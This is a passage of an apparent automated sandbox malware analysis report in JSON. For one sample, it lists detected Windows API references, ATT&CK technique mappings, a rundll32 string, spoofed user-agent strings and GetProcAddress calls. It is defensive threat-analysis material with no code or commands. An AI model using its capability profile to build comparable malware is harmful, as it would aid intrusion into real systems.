reference to API (Indicator: \"WSACleanup\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"WSAStartup\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"gethostbyname\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"htons\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"closesocket\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetModuleFileNameExA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"EnumProcessModules\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"EnumProcesses\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"Process32Next\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"Process32First\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"InternetGetConnectedState\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"AnimateWindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"CreateEventA\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"SetSystemTime\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTempFileNameA\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"lstrlenA\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetFileTime\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenFile\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"ReadProcessMemory\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"WinExec\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileTime\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"LoadIconA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetTimer\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SendMessageA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetKeyState\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnableWindow\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetParent\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindow\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetDesktopWindow\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsWindow\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegisterWindowMessageA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"PostMessageA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsWindowEnabled\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SendMessageTimeoutA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsWindowVisible\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindWindowA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindWindowExA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShowWindow\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetWindowPos\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetClassNameA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegDeleteKeyA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegDeleteValueA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetConnectA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpAddRequestHeadersA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetTimeToSystemTime\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpQueryInfoA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetReadFile\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteUrlCacheEntry\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameExA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumProcessModules\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumProcesses\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetGetConnectedState\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"CreateEventA\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"SetSystemTime\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTempFileNameA\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"lstrlenA\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"ElevateCreateProcess\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found reference to API \"9059320660,5916,3139,,CreateProcessA,kernel32.dll,\"252:02:53.829\",RX=0,PX=0\" (Indicator: \"CreateProcess\"; Source: \"00000000-00006120.00000000.66663.00180000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-307", "type": 2, "relevance": 1, "name": "Contains ability to create/load registry keys (API string)", "description": "Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-170", "type": 2, "relevance": 1, "name": "Possibly uses system binaries (Windows LOLbins)", "description": "Observed system executable string:\"%WINDIR%\\system\\rundll32.exe\" [Source: 00000000-00006120-00000C43-9059320660]", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\" (Indicator: \"mozilla/4.0 (\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005596-00000C96-8595037216\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/7.0)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/7.0)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; rv:11.0) like Gecko\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp, 00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetProcAddress\" with a 